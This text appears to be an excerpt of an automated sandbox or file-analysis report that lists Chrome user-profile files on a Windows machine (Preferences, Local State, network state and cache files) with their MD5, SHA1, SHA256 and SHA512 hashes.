SHA1 cf06af200f5e3d161ac1d76e9709a15c43a0a1b1
SHA256 56ae11ea263cc93d1015a67e857ccafce60db8036ff3acee169490cd7dd01444
SHA512 e52a6992bf016ca7e266fbbecdd092bb5feaf02a135866a7e740adf7a8e23ffa902a6b4d692c124683239a6d631cc2a46bb208f29e1ffbe7e36c369046ead0d1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4eb54ee612e0e88bbeaebfacc3cf726c
SHA1 8119948debb42444aced5e43b2c66ba2ac15199e
SHA256 8a815122e69710e7d33660f38c7ff03da06f05e834aa9988d9a68572578d87a0
SHA512 c5a9b861a146c821b62a141c16ee324b0a551b91ab880ba66ffc02a602d954180ce2d4727e99bdcdcbdb4872f388844f4cefc43b45f33d70988ac81ac541b239

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 95da39d8b0c6f07d70d3206e78a4ea59
SHA1 7a94d8c31e6410ed543bf990b612de824421693e
SHA256 4377e8aef1b035ce76ddd243e46a02c270aa133996103aa0f134229dc8af104a
SHA512 fd6e8826194a38852b53c8092bd2fc15ebaa6d988dcd66b99086327c7e3b4ba2fc838c73fe0947e2ab61e75f19d96b3584fb8c4b93819f6955d24df06149078b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1ae36961b8f262b7f2d12cd90ad78bd8
SHA1 67a8079e70432cc3ae0d2c77d30b8b48f51fbfb9
SHA256 4642b1c9799459265847358683bede9d34ccefac1533617644201225860291f5
SHA512 236d27a089d5d08a6d671fd0ac10d5343c5b5a46af5b55bda57058476acf95763ef02e23501d2d022f198949b9d5c3f9875102a0d52f3d4e66ed2d223ebd8760

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 479b46f6b9b8fcb10320b156e54e4252
SHA1 e045d82f272abf3f9b0b5404de9fbb1081ae9816
SHA256 41b87d2302a5ad91058614e601c0287169cff36fccbba6a6ad5f15469ea90044
SHA512 283528c5bc5bbd1affb48672a1852ba2b6db457541615972089d0da9fe44b8173cec0789f25e59ba54ceaa810c7e5b676a7936bcb05e2d9d2be84d9c18d1156e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 64751faccc9c30a89bec40281b78dd20
SHA1 1f4b5e7e6c3d77896e774c646c3a4459ca3d2079
SHA256 cf0a0eda8e2eb888cebbd0a6e7973cad38512c4db1a40ec0e5951ca70a2c3f89
SHA512 cf51934c50b1e2353715ca2ad6f28eb22f4100327d4ccc204a3f000508d1600ba0d05db8c73dc5842ea87bc64b9114ff37e7d080beb1ab10c5d5b623f800e394

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 677e91124ee4073e6ec8fe10f0fb7f41
SHA1 0fa2c5566711253808c65e9e01c323b7a3184513
SHA256 8aa18d8750026477dcbc4dc76128d725301e19dcf98fe5dcd7b36dc26f6456a7
SHA512 392d7bf4868df99c32eb781928585b0e7bdd3e8a3d8c2ee66442a1f91a6b981ed0c20a68994e4842ecb6848fc161b8395bbaa6691941bcf66e109c38c233471e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4cdb46712c3d2a346fa106e885fe2a3d
SHA1 162ccfe5639752f9eca0be0b19d79bec04152b61
SHA256 1f448eef383363c2809521b2b358e955c095607d723c5f243e62b5fa663565e3
SHA512 6b0570127d1f05c43c135eea8c109b7cc4b51e7fe4a1375da3c21660430f9ebc2f96934ccfbce12d4ea604c951c782f0dea966961faea5fa2629d601555f2f89

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d63bdf582d0b96f9be1a9bfd7158deeb
SHA1 4ca4f68845ceb41fb337d5913f474da2a5f5d1a9
SHA256 147420e2ca2a68aef9b93288c0d4df735618e2de5b2f850ac8ac1fd49138bb5f
SHA512 1ebdefde22e74bb15927aec0fbe1e79af56385655c75c7a370f11873f1673a9362b139d2deeda46a4c01fdd71f0c99fb3ba893150790d545487234e272046ff2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 a05aed638a9019ef96f3a00fbda7761e
SHA1 78499c2c61e6c393676276ec947036b19fbe31f1
SHA256 b2351a2deec51ae365d8002e2689df8b61dda32d5cdad5ac45088566277a2d23
SHA512 fffe91c32cf60ecc1de7b581b49656801aa963ea9ff30083c28e462e9e4f8d1a35cb34fb586ae09228f66275567a6a59862f7e5dd3530a5e44eb7648f5c9bd79